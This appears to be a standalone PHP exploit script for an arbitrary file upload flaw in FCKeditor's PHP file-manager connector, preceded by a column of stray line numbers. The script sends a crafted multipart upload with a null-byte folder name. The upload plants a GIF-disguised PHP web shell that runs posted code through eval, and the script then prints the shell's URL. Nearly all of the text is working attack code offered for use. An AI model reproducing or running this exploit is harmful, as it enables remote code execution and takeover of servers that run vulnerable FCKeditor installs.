Fckeditor PHP Exp

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109

<?php

error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

$match = array();

function http_send($host, $packet)

{

$sock = fsockopen($host, 80);

while (!$sock)

{

print "\n[-] No response from {$host}:80 Trying again...";

$sock = fsockopen($host, 80);

}

fputs($sock, $packet);

while (!feof($sock)) $resp .= fread($sock, 1024);

fclose($sock);

print $resp;

return $resp;

}

function connector_response($html)

{

global $match;

return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));

}

print "\n+------------------------------------------------------------------+";

print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";

print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)

{

print "\nUsage......: php $argv[0] host path\n";

print "\nExample....: php $argv[0] localhost /\n";

print "\nExample....: php $argv[0] localhost /FCKEditor/\n";

die();

}

$host = $argv[1];

$path = ereg_replace("(/){2,}", "/", $argv[2]);

$filename = "ice.gif";

$foldername = "ice.php%00.gif";

$connector = "editor/filemanager/connectors/php/connector.php";

$payload = "-----------------------------265001916915724\r\n";

$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";

$payload .= "Content-Type: image/jpeg\r\n\r\n";

$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[ice]) ?>'."\n";

$payload .= "-----------------------------265001916915724--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;

print $packet;

if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");

else print "\n[-] Job done! try http://${host}/$match[2] \n";

?>